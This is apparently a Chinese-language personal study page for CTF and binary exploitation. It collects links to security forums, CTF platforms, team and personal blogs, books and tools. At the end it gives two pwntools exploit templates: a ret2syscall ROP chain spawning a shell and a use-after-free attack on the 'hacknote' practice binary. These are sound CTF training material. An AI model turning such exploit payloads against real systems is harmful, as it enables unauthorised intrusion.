[toc]

每日可看

玄武实验室 sec.today

安全研究 GoSSIP 公众号每日推送

吾爱破解 https://www.52pojie.cn

看雪论坛 https://bbs.kanxue.com

v2ex 分享探索 社区 https://www.v2ex.com

资源整合和学习路径

https://csdiy.wiki/ 北大学生总结的自学指南,非常好,融合了许多优质的公开课程和书籍

最近待看

https://github.com/firmianay/CTF-All-In-One/tree/master 感觉作者有添加一些新的东西(相比那本书)

https://seedsecuritylabs.org/instructor_manual.html seedlab

https://nju-projectn.github.io/ics-pa-gitbook/ics2021/ 南大计算机基础实验

http://www.hackdig.com

https://www.bookstack.cn/read/webxiaohua-gitbook/README.md

https://hacklido.com/ 一个国外的网站, 有篇很励志的文章https://hacklido.com/blog/439-how-i-got-my-oscp-at-16-years-old

https://hsqstephenzhang.github.io/2022/02/10/linux/syscall/vdso/ 腾讯云容器团队的一个老哥的博客,感觉挺有意思

北理工那个团队网站 https://www.isclab.org.cn

https://www.ooopn.com 一个工具网站

https://bbs.kanxue.com/thread-218617.htm 看雪 个人博客

https://hnusec.github.io/#/Stuff

国际知名战队的博客等

https://defcon.org/html/defcon-29/dc-29-speakers.html#fournier

https://blog.csdn.net/Breeze_CAT/article/details/103788631

https://wizardforcel.gitbooks.io/100-gdb-tips/content/call-func.html

https://www.52pojie.cn/thread-1399142-1-1.html

https://hack1s.fun/page/2/

http://javabin.cn 一个搞物联网的,感觉挺有意思

问题

libc.so.6怎么用?

https://www.cnblogs.com/Taolaw/p/16281185.html

Glibc,libc gcc工作原理了解清楚

学习资源

安全会议

四大顶会

blackhat https://www.blackhat.com

https://www.blackhat.com/latestintel/

https://www.blackhat.com/html/archives.html

安全社区(可以没事多逛逛)

玄武实验室 sec.today

吾爱破解 https://www.52pojie.cn

看雪论坛 https://bbs.kanxue.com

v2ex 分享探索 社区 https://www.v2ex.com

https://www.ctfiot.com chamd5的! 一个综合信息平台

学习网站

CTFwiki(入门必看wiki): https://ctf-wiki.github.io/ctf-wiki/#/introduction

ctftime ctf各个比赛日程,很权威

buuctf https://buuoj.cn/

ctfshow https://ctf.show/challenges

ctfhub

CTFrank: https://ctfrank.org/

攻防世界 xctf官方: https://time.xctf.org.cn

i春秋 https://www.ichunqiu.com/competition

http://www.wechall.net/active_sites 一个ctf网站,同时也收录了很多学习网站

Tryhackme\hackthebox\

蓝桥云课

pwn专属

pwn.college 由浅入深,一步一步,还有机器可以用!

https://pwnable.kr

http://pwnable.tw

重要比赛

defcon https://defcon.org/html/defcon-30/dc-30-training.html

书籍

《计算机安全导论:深度实践 (杜文亮) 》 很适合入门,讲的非常详细

《从0到1,CTFer的成长之路》

《CTF权威指南-PWN篇》

大佬博客

https://xuanxuanblingbling.github.io xuanxuan和他对象的,记录了从小白到大神的一路,感觉写得非常好!

https://blingblingxuanxuan.github.io

https://hurricane618.me IIE学长的博客,有写自己的心路历程,感觉很不错,能从中看到一个人的成长

https://kiprey.github.io 清华网安硕士在读,博客深入浅出,良好的学习路线

https://blog.csdn.net/weixin_45209963?type=blog 天大pwn老哥的博客

计算机底层的秘密 https://github.com/webxiaohua/gitbook/blob/master/SUMMARY.md 这个合集不错

http://ifsec.blogspot.com/2018/02/so-you-want-to-work-in-security-and-for.html

https://bestwing.me/archives/page/14/

https://etenal.me/archives/1121 待看,这个也不错,这一篇是堆的

http://blog.imv1.me NeSE搞内核安全的大佬学长

https://eqqie.cn

https://github.com/kiprey/skr_Learning 一个非常不错的成长路线(每周更新),可以参考,

https://cjting.me 做的一些很深入的小研究,治愈系

https://trailofbits.github.io/ctf/

https://security.ntu.st/

https://github.com/BrieflyX/ctf-pwns

Atum

https://hpdoger.cn/about/ 又一个学长的博客

https://trailofbits.github.io/ctf/

https://security.ntu.st/

https://etenal.me/archives/972#C1

https://github.com/BrieflyX/ctf-pwns

https://y4er.com web

http://scz.617.cn:8 不知道是哪个大佬..

http://showlinkroom.me

https://eternalsakura13.com/

https://kiprey.github.io/

http://blog.eonew.cn/

http://ruanyifeng.com/blog/2018/02/docker-tutorial.html

https://thiscute.world/ 最近发现的两个计算机的大佬,在v2ex中发现的

https://soulteary.com

0xffff社区

https://0xffff.one/d/1085-mit6-s081-operating-system

CTF知名战队网站

国科大-NeSE:https://nese.team

清华:https://redbud.info

复旦白泽战队:知乎、微信公众号

X1cT34m: https://ctf.njupt.edu.cn

SU:https://team-su.github.io

星盟:https://space.bilibili.com/489643272 有ctf培训课程 pwn已完结 、 微信公众号:星盟安全

天璇Merak: 微信公众号,有一些文章,更新较少

星盟 http://blog.xmcve.com

漏洞挖掘/分析工具

angr

一些小工具:

Compiler Explorer 在线应用层代码转汇编

在线运行汇编 https://www.tutorialspoint.com/compile_assembly_online.php

https://www.textcompare.org diff网站,比较各种内容的不同

https://gchq.github.io/CyberChef/ 解密解码工具

https://cloudconvert.com 在线格式转换

https://web.archive.org 查看历史网站记录

https://cloudconvert.com 各种文件的格式转换

https://www.ilovepdf.com pdf操作,切割等

ctf导航

http://www.ctfiot.com. ChaMd5团队做的

https://ctf.mzy0.com

特定漏洞相关资源

how2heap(github)

https://bbs.kanxue.com/thread-272416.htm#msg_header_h1_2

待整理资源

https://blog.csdn.net/Breeze_CAT/article/details/103788631

其他

查看系统调用

https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl

系统调用参考\查看系统调用参数

https://syscalls64.paolostivanin.com

https://elixir.bootlin.com/linux/v5.19/C/ident/getname

macbook 快捷键

http://dragon-li.gitee.io/my-wiki/doc/mac/005-Mac下Iterm2使用及快捷键.html

解题模版

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
context.log_level= "debug"
context.arch='amd64' //

sh = process("./ret2syscall")

context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(sh,"break *0x8048e96")

binsh = 0x080BE408
edxecxebx = 0x0806eb90
eaxret = 0x080bb196
int80 = 0x08049421

payload = b"a"*(108 + 4) + p32(eaxret) + p32(0xb) + p32(edxecxebx) + p32(0) + p32(0) + p32(0x080BE408)+p32(int80)

sh.send(payload)
sh.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
context.log_level= "debug"
context.arch='amd64'

io = process("./hacknote")


def add(length,context):
io.sendlineafter("choice","1")
io.sendlineafter("size",str(length))
io.sendlineafter("Content",context)
def delete(index):
io.sendlineafter("choice","2")
io.sendlineafter("Index",str(index))
def Print(index):
io.sendlineafter("choice","3")
io.sendlineafter("Index",str(index))

add(16,"aaa")
add(16,"bbb")
delete(0)
delete(1)
add(8,p32(0x08048986))
Print(0)
io.interactive()
#io.recv(1024)

libc版本问题,需要换一下

2.27

[DEBUG] Received 0x29 bytes:
b’free(): double free detected in tcache 2\n’